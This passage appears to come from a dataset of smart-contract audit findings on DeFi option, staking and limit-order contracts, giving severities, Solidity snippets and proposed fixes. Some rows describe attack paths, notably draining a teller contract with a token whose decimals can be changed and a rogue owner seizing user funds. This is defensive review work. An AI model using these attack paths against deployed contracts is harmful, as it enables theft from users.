scenario:\\nLet's suppose the `FixedStrikeOptionTeller` holds some DAI tokens.\\nAn attacker can create a malicious payout token of which he can control the `decimals`.\\nThe attacker calls `deploy` to create an option token with malicious payout token and DAI as quote token and `put` option type\\nMake `payoutToken.decimals` return a large number and call `FixedStrikeOptionTeller.create` with input X. Here `quoteAmount` will be calculated as `0`.\\n```\\n// Calculate amount of quote tokens required to mint\\nuint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n// Transfer quote tokens from user\\n// Check that amount received is not less than amount expected\\n// Handles edge cases like fee-on-transfer tokens (which are not supported)\\nuint256 startBalance = quoteToken.balanceOf(address(this));\\nquoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n```\\n\\nSo 0 DAI will be pulled from the attacker's account but he will receive X option token.\\nMake `payoutToken.decimals` return a small value and call `FixedStrikeOptionTeller.exercise` with X input. Here `quoteAmount` will be calculated as a very high number (which represents number of DAI tokens). So he will receive huge amount of DAI against his X option tokens when exercise the option or when reclaim the token\\n```\\n// Transfer remaining collateral to receiver\\nuint256 amount = optionToken.totalSupply();\\nif (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n} else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n}\\n```\\n\\nHence, the attacker was able to drain all DAI tokens from the `FixedStrikeOptionTeller` contract. 
The same mechanism can be repeated to drain all other ERC20 tokens from the `FixedStrikeOptionTeller` contract by changing the return value of the decimal external call","Consider storing the `payoutToken.decimals` value locally instead of fetching it real-time on all `exercise` or `reclaim` calls.\\nor support payout token and quote token whitelist, if the payout token and quote token are permissionless created, there will always be high risk","Anyone can drain `FixedStrikeOptionTeller` contract of all ERC20 tokens. The cost of attack is negligible (only gas cost).\\nHigh impact, high likelyhood.","```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n" +Blocklisted address can be used to lock the option token minter's fund,medium,"Blocklisted address can be used to lock the option token minter's fund\\nWhen deploy a token via the teller contract, the contract validate that receiver address is not address(0)\\nHowever, a malicious option token creator can save a seemingly favorable strike price and pick a blocklisted address and set the blocklisted address as receiver\\nSome tokens (e.g. USDC, USDT) have a contract level admin controlled address blocklist. If an address is blocked, then transfers to and from that address are forbidden.\\nMalicious or compromised token owners can trap funds in a contract by adding the contract address to the blocklist. This could potentially be the result of regulatory action against the contract itself, against a single user of the contract (e.g. 
a Uniswap LP), or could also be a part of an extortion attempt against users of the blocked contract.\\nthen user would see the favorable strike price and mint the option token using payout token for call option or use quote token for put option\\nHowever, they can never exercise their option because the transaction would revert when transferring asset to the recevier for call option and transferring asset to the receiver for put option when exercise the option.\\n```\\n\\n```\\n\\nthe usre's fund that used to mint the option are locked","Valid that receiver is not blacklisted when create and deploy the option token or add an expiry check, if after the expiry the receiver does not reclaim the fund, allows the option minter to burn their token in exchange for their fund",Blocklisted receiver address can be used to lock the option token minter's fund,```\\n\\n```\\n +Loss of option token from Teller and reward from OTLM if L2 sequencer goes down,medium,"Loss of option token from Teller and reward from OTLM if L2 sequencer goes down\\nIn the current implementation, if the option token expires, the user is not able to exerise the option at strike price\\n```\\n // Validate that option token is not expired\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nif the option token expires, the user lose rewards from OTLM as well when claim the reward\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n```\\n\\nand\\n```\\n // If the option token has expired, then the rewards are zero\\n if (uint256(optionToken.expiry()) < block.timestamp) return 0;\\n```\\n\\nAnd in the onchain context, the protocol intends to deploy the contract in arbitrum and 
optimism\\n```\\nQ: On what chains are the smart contracts going to be deployed?\\nMainnet, Arbitrum, Optimism\\n```\\n\\nHowever, in the Arbitrum and Optimism layer 2 networks, the sequencer is in charge of processing the transactions\\nFor example, the recent Optimism Bedrock upgrade caused the sequencer to be unable to process transactions for a few hours\\nBedrock Upgrade According to the official announcement, the upgrade will require 2-4 hours of downtime for OP Mainnet, during which there will be downtime at the chain and infrastructure level while the old sequencer is spun down and the Bedrock sequencer starts up.\\nTransactions, deposits, and withdrawals will also remain unavailable for the duration, and the chain will not be progressing. While the read access across most OP Mainnet nodes will stay online, users may encounter a slight decrease in performance during the migration process.\\nIn Arbitrum\\nArbitrum Goes Down Citing Sequencer Problems Layer 2 Arbitrum suffers 10 hour outage.\\nand\\nEthereum layer-2 (L2) scaling solution Arbitrum stopped processing transactions on June 7 because its sequencer faced a bug in the batch poster. 
The incident only lasted for an hour.\\nIf the option expires during the sequencer down time, the user basically have worthless option token because they cannot exercise the option at strike price\\nthe user would lose his reward as option token from OTLM.sol, which defeats the purpose of use OTLM to incentive user to provide liquidity",chainlink has a sequencer up feed\\nconsider integrate the up time feed and give user extra time to exercise token and claim option token reward if the sequencer goes down,Loss of option token from Teller and reward from OTLM if L2 sequencer goes down,```\\n // Validate that option token is not expired\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n +Use A's staked token balance can be used to mint option token as reward for User B if the payout token equals to the stake token,medium,"User's staked token balance can be used to mint option token as reward if the payout token equals to the stake token, can cause user to loss fund\\nIn OTLM, user can stake stakeToken in exchange for the option token minted from the payment token\\nwhen staking, we transfer the stakedToken in the OTLM token\\n```\\n// Increase the user's stake balance and the total balance\\nstakeBalance[msg.sender] = userBalance + amount_;\\ntotalBalance += amount_;\\n\\n// Transfer the staked tokens from the user to this contract\\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n```\\n\\nbefore the stake or unstake or when we are calling claimReward\\nwe are calling _claimRewards -> _claimEpochRewards -> we use payout token to mint and create option token as reward\\n```\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n\\n // Transfer rewards to sender\\n ERC20(address(optionToken)).safeTransfer(msg.sender, rewards);\\n```\\n\\nthe problem is, if the stake token and the payout token are the same token, the protocol does not distingush the balance of the 
stake token and the balance of payout token\\nsuppose both stake token and payout token are USDC\\nsuppose user A stake 100 USDC\\nsuppose user B stake 100 USDC\\ntime passed, user B accrues 10 token unit reward\\nnow user B can claimRewards,\\nthe protocol uses 10 USDC to mint option token for B\\nthe OTLM has 190 USDC\\nif user A and user B both call emergencyUnstakeAll, whoever calls this function later will suffer a revert and he is not able to even give up the reward and claim their staked balance back\\nbecause a part of his staked token balance is treated as the payout token to mint option token reward for other user",Separate the accounting of the staked user and the payout token or check that staked token is not payout token when creating the OTLM.sol,"If there are insufficient payout token in the OTLM, the expected behavior is that the transaction revert when claim the reward and when the code use payout token to mint option token\\nand in the worst case, user can call emergencyUnstakeAll to get their original staked balance back and give up their reward\\nhowever, if the staked token is the same as the payout token,\\na part of the user staked token can be mistakenly and constantly mint as option token reward for his own or for other user and eventually when user call emergencyUnstakeAll, there will be insufficient token balance and transaction revert\\nso user will not be able to get their staked token back","```\\n// Increase the user's stake balance and the total balance\\nstakeBalance[msg.sender] = userBalance + amount_;\\ntotalBalance += amount_;\\n\\n// Transfer the staked tokens from the user to this contract\\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n```\\n" +IERC20(token).approve reverts if the underlying ERC20 token approve does not return boolean,medium,"IERC20(token).approve reverts if the underlying ERC20 token approve does not return boolean\\nWhen transferring the token, the protocol uses safeTransfer and 
safeTransferFrom\\nbut when approving the payout token, the safeApprove is not used\\nfor non-standard token such as USDT,\\ncalling approve will revert because the solmate ERC20 enforce the underlying token return a boolean\\n```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n\\nwhile the token such as USDT does not return boolean",Use safeApprove instead of approve,USDT or other ERC20 token that does not return boolean for approve is not supported as the payout token,"```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n" +Division before multiplication result in loss of token reward if the reward update time elapse is small,medium,"Division before multiplication result in loss of token reward\\nWhen calcuting the reward, we are calling\\n```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n\\nthe precision loss can be high because the accumulated reward depends on the time elapse:\\n(block.timestamp - lastRewardUpdate)\\nand the REWARD_PERIOD is hardcoded to one days:\\n```\\n /// @notice Amount of time (in 
seconds) that the reward rate is distributed over\\n uint48 public constant REWARD_PERIOD = uint48(1 days);\\n```\\n\\nif the time elapse is short and the currentRewardsPerToken is updated frequently, the precision loss can be heavy and even rounded to zero\\nthe lower the token precision, the heavier the precision loss\\nSome tokens have low decimals (e.g. USDC has 6). Even more extreme, some tokens like Gemini USD only have 2 decimals.\\nconsider as extreme case, if the reward token is Gemini USD, the reward rate is set to 1000 * 10 = 10 ** 4 = 10000\\nif the update reward keep getting called within 8 seconds\\n8 * 10000 / 86400 is already rounded down to zero and no reward is accruing for user",Avoid division before multiplication and only perform division last,Division before multiplication results in loss of token reward if the reward update time elapse is small,```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n +FixedStrikeOptionTeller: create can be invoked when block.timestamp == expiry but exercise reverts,medium,"In `FixedStrikeOptionTeller` contract, new option tokens can be minted when `block.timestamp == expiry` but these option tokens cannot be exercised even in the same transaction.\\nThe `create` function has this statement:\\n```\\n if (uint256(expiry) < block.timestamp) revert 
Teller_OptionExpired(expiry);\\n```\\n\\nThe `exercise` function has this statement:\\n```\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nNotice the `>=` operator which means when `block.timestamp == expiry` the `exercise` function reverts.\\nThe `FixedStrikeOptionTeller.create` function is invoked whenever a user claims his staking rewards using `OTLM.claimRewards` or `OTLM.claimNextEpochRewards`. (here)\\nSo if a user claims his rewards when `block.timestamp == expiry` he receives the freshly minted option tokens but he cannot exercise these option tokens even in the same transaction (or same block).\\nMoreover, since the receiver do not possess these freshly minted option tokens, he cannot `reclaim` them either (assuming `reclaim` function contains the currently missing `optionToken.burn` statement).",Consider maintaining a consistent timestamp behaviour. Either prevent creation of option tokens at expiry or allow them to be exercised at expiry.,Option token will be minted to user but he cannot exercise them. Receiver cannot reclaim them as he doesn't hold that token amount.\\nThis leads to loss of funds as the minted option tokens become useless. 
Also the scenario of users claiming at expiry is not rare.,```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n +stake() missing set lastEpochClaimed when userBalance equal 0,medium,"because `stake()` don't set `lastEpochClaimed[user] = last epoch` if `userBalance` equal 0 So all new stake user must loop from 0 to `last epoch` for `_claimRewards()` As the epoch gets bigger and bigger it will waste a lot of GAS, which may eventually lead to `GAS_OUT`\\nin `stake()`, when the first-time `stake()` only `rewardsPerTokenClaimed[msg.sender]` but don't set `lastEpochClaimed[msg.sender]`\\n```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n\\nso every new staker , needs claims from 0\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n\\n // If the last epoch claimed is equal to the current epoch, then only try to claim for the current epoch\\n if (userLastEpoch == epoch) return _claimEpochRewards(epoch);\\n\\n // 
If not, then the user has not claimed all rewards\\n // Start at the last claimed epoch because they may not have completely claimed that epoch\\n uint256 totalRewardsClaimed;\\n for (uint48 i = userLastEpoch; i <= epoch; i++) {\\n // For each epoch that the user has not claimed rewards for, claim the rewards\\n totalRewardsClaimed += _claimEpochRewards(i);\\n }\\n\\n return totalRewardsClaimed;\\n }\\n```\\n\\nWith each new addition of `epoch`, the new stake must consumes a lot of useless loops, from loop 0 to last `epoch` When `epoch` reaches a large size, it will result in GAS_OUT and the method cannot be executed","```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n+ lastEpochClaimed[msg.sender] = epoch;\\n }\\n```\\n","When the `epoch` gradually increases, the new take will waste a lot of GAS When it is very large, it will cause GAS_OUT","```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n 
stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n" +"claimRewards() If a rewards is too small, it may block other epochs",medium,"When `claimRewards()`, if some `rewards` is too small after being round down to 0 If `payoutToken` does not support transferring 0, it will block the subsequent epochs\\nThe current formula for calculating rewards per cycle is as follows.\\n```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n\\nCalculate `rewards` formula : uint256 `rewards` = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /10 ** stakedTokenDecimals;\\nWhen `rewardsPerTokenEnd` is very close to `userRewardsClaimed`, `rewards` is likely to be round downs to 0 Some tokens do not support transfer(amount=0) This will revert and lead to can't claims","```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code..\\n\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n+ if (rewards == 0 ) return 0;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n",Stuck `claimRewards()` when the rewards of an epoch is 0,"```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) 
* stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n" +Lack of segregation between users' assets and collected fees resulting in loss of funds for the users,high,"The users' assets are wrongly sent to the owner due to a lack of segregation between users' assets and collected fees, which might result in an irreversible loss of assets for the victims.\\nGLX uses the Chainlink Automation to execute the `LimitOrderRegistry.performUpkeep` function when there are orders that need to be fulfilled. The `LimitOrderRegistry` contract must be funded with LINK tokens to keep the operation running.\\nTo ensure the LINK tokens are continuously replenished and funded, users must pay a fee denominated in Native ETH or ERC20 WETH tokens on orders claiming as shown below. 
The collected ETH fee will be stored within the `LimitOrderRegistry` contract.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\nTo retrieve the ETH fee collected, the owner will call the `LimitOrderRegistry.withdrawNative` function that will send all the Native ETH and ERC20 WETH tokens within the `LimitOrderRegistry` contract to the owner's address. After executing this function, the Native ETH and ERC20 WETH tokens on this contract will be zero and wiped out.\\n```\\nFile: LimitOrderRegistry.sol\\n function withdrawNative() external onlyOwner {\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n }\\n```\\n\\nMost owners will automate replenishing the `LimitOrderRegistry` contract with LINK tokens to ensure its balance does not fall below zero and for ease of maintenance. 
For instance, a certain percentage of the collected ETH fee (e.g., 50%) will be swapped immediately to LINK tokens on a DEX upon collection and transferred the swapped LINK tokens back to the `LimitOrderRegistry` contract. The remaining will be spent to cover operation and maintenance costs.\\nHowever, the issue is that there are many Uniswap V3 pools where their token pair consists of ETH/WETH. In fact, most large pools in Uniswap V3 will consist of ETH/WETH. For instance, the following Uniswap pools consist of ETH/WETH as one of the pool tokens:\\nUSDC / ETH (0.05% Fee) (TLV: $284 million)\\nWBTC / ETH (0.3% Fee) (TLV: $227 million)\\nUSDC / ETH (0.3% Fee) (TLV: $88 million)\\nDAI / ETH (0.3% Fee) (TLV: $14 million)\\nAssume that the owner has configured and setup the `LimitOrderRegistry` contract to work with the Uniswap DAI/ETH pool, and the current price of the DAI/ETH pool is 1,500 DAI/ETH.\\nBob submit a new Buy Limit Order swapping DAI to ETH at the price of 1,000 DAI/ETH. Bob would deposit 1,000,000 DAI to the `LimitOrderRegistry` contract.\\nWhen Bob's Buy Limit Order is ITM and fulfilled, 1000 ETH/WETH will be sent to and stored within the `LimitOrderRegistry` contract.\\nThe next step that Bob must do to claim the swapped 1000 ETH/WETH is to call the `LimitOrderRegistry.claimOrder` function, which will collect the fee and transfer the swapped 1000 ETH/WETH to Bob.\\nUnfortunately, before Bob could claim his swapped ETH/WETH, the `LimitOrderRegistry.withdrawNative` function is triggered by the owner or the owner's bots. As noted earlier, when the `LimitOrderRegistry.withdrawNative` function is triggered, all the Native ETH and ERC20 WETH tokens on this contract will be transferred to the owner's address. 
As a result, Bob's 1000 swapped ETH/WETH stored within the `LimitOrderRegistry` contract are sent to the owner's address, and the balance of ETH/WETH in the `LimitOrderRegistry` contract is zero.\\nWhen Bob calls the `LimitOrderRegistry.claimOrder` function, the transaction will revert because insufficient ETH/WETH is left in the `LimitOrderRegistry` contract.\\nUnfortunately for Bob, there is no way to recover back his ETH/WETH that is sent to the owner's address. Following outline some of the possible scenarios where this could happen:\\nThe owners set up their infrastructure to automatically swap a portion or all the ETH/WETH received to LINK tokens and transfer them to the `LimitOrderRegistry` contract, and there is no way to retrieve the deposited LINK tokens from the `LimitOrderRegistry` contract even if the owner wishes to do so as there is no function within the contract to allow this action.\\nThe owners set up their infrastructure to automatically swap a small portion of ETH/WETH received to LINK tokens and send the rest of the ETH/WETH to 100 investors/DAO members' addresses. So, it is no guarantee that the investors/DAO members will return the ETH/WETH to Bob.","Consider implementing one of the following solutions to mitigate the issue:\\nSolution 1 - Only accept Native ETH as fee\\nUniswap V3 pool stored ETH as Wrapped ETH (WETH) ERC20 token internally. When the `collect` function is called against the pool, WETH ERC20 tokens are returned to the caller. 
Thus, the most straightforward way to mitigate this issue is to update the contract to `collect` the fee in Native ETH only.\\nIn this case, there will be a clear segregation between users' assets (WETH) and owner's fee (Native ETH)\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n// Remove the line below\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n// Add the line below\\n if (nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n// Remove the line below\\n // transfer wrappedNativeBalance if it exists\\n// Remove the line below\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\n\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value // Remove the line below\\n userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund); \\n } else {\\n// Remove the line below\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n// Remove the line below\\n // If value is non zero send it back to caller.\\n// Remove the line below\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n// Add the line below\\n revert LimitOrderRegistry__InsufficientFee;\\n }\\n..SNIP..\\n```\\n\\nSolution 2 - Define state variables to keep track of the collected fee\\nConsider defining state variables to keep track of the 
collected fee so that the fee will not mix up with users' assets.\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n// Add the line below\\n collectedNativeETHFee // Add the line below\\n= userClaim.feePerUser\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n// Add the line below\\n collectedWETHFee // Add the line below\\n= userClaim.feePerUser\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n// Remove the line below\\n uint256 nativeBalance = address(this).balance;\\n// Add the line below\\n uint256 wrappedNativeBalance = collectedWETHFee;\\n// Add the line below\\n uint256 nativeBalance = collectedNativeETHFee;\\n// Add the line below\\n collectedWETHFee = 0; // clear the fee\\n// Add the line below\\n collectedNativeETHFee = 0; // clear the fee\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\n",Loss of assets for the users,"```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n 
tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n" +Users' funds could be stolen or locked by malicious or rouge owners,high,"Users' funds could be stolen or locked by malicious or rouge owners.\\nIn the contest's README, the following was mentioned.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nrestricted. the owner should not be able to steal funds.\\nIt was understood that the owner is not ""trusted"" and should not be able to steal funds. Thus, it is fair to assume that the sponsor is keen to know if there are vulnerabilities that could allow the owner to steal funds or, to a lesser extent, lock the user's funds.\\nMany control measures are implemented within the protocol to prevent the owner from stealing or locking the user's funds.\\nHowever, based on the review of the codebase, there are still some ""loopholes"" that the owner can exploit to steal funds or indirectly cause losses to the users. Following is a list of methods/tricks to do so.\\nMethod 1 - Use the vulnerable `withdrawNative` function\\nOnce the user's order is fulfilled, the swapped ETH/WETH will be sent to the contract awaiting the user's claim. 
However, the owner can call the `withdrawNative` function, which will forward all the Native ETH and Wrapped ETH in the contract to the owner's address due to another bug (""Lack of segregation between users' assets and collected fees resulting in loss of funds for the users"") that I highlighted in another of my report.\\nMethod 2 - Add a malicious custom price feed\\n```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n\\nThe owner can create a malicious price feed contract and configure the `LimitOrderRegistry` to use it by calling the `setFastGasFeed` function.\\n```\\nFile: LimitOrderRegistry.sol\\n function performUpkeep(bytes calldata performData) external {\\n (UniswapV3Pool pool, bool walkDirection, uint256 deadline) = abi.decode(\\n performData,\\n (UniswapV3Pool, bool, uint256)\\n );\\n\\n if (address(poolToData[pool].token0) == address(0)) revert LimitOrderRegistry__PoolNotSetup(address(pool));\\n\\n PoolData storage data = poolToData[pool];\\n\\n // Estimate gas cost.\\n uint256 estimatedFee = uint256(upkeepGasLimit * getGasPrice());\\n```\\n\\nWhen fulfilling an order, the `getGasPrice()` function will fetch the gas price from the malicious price feed that will report an extremely high price (e.g., 100000 ETH), causing the `estimatedFee` to be extremely high. When users attempt to claim the order, they will be forced to pay an outrageous fee, which the users cannot afford to do so. Thus, the users have to forfeit their orders, and they will lose their swapped tokens.","Consider implementing the following measures to reduce the risk of malicious/rouge owners from stealing or locking the user's funds.\\nTo mitigate the issue caused by the vulnerable `withdrawNative` function. 
Refer to my recommendation in my report titled ""Lack of segregation between users' assets and collected fees resulting in loss of funds for the users"".\\nTo mitigate the issue of the owner adding a malicious custom price feed, consider performing some sanity checks against the value returned from the price feed. For instance, it should not be larger than the `MAX_GAS_PRICE` constant. If it is larger than `MAX_GAS_PRICE` constant, fallback to the user-defined gas feed, which is constrained to be less than `MAX_GAS_PRICE`.",Users' funds could be stolen or locked by malicious or rouge owners.,```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n +Owners will incur loss and bad debt if the value of a token crashes,medium,"If the value of the swapped tokens crash, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it 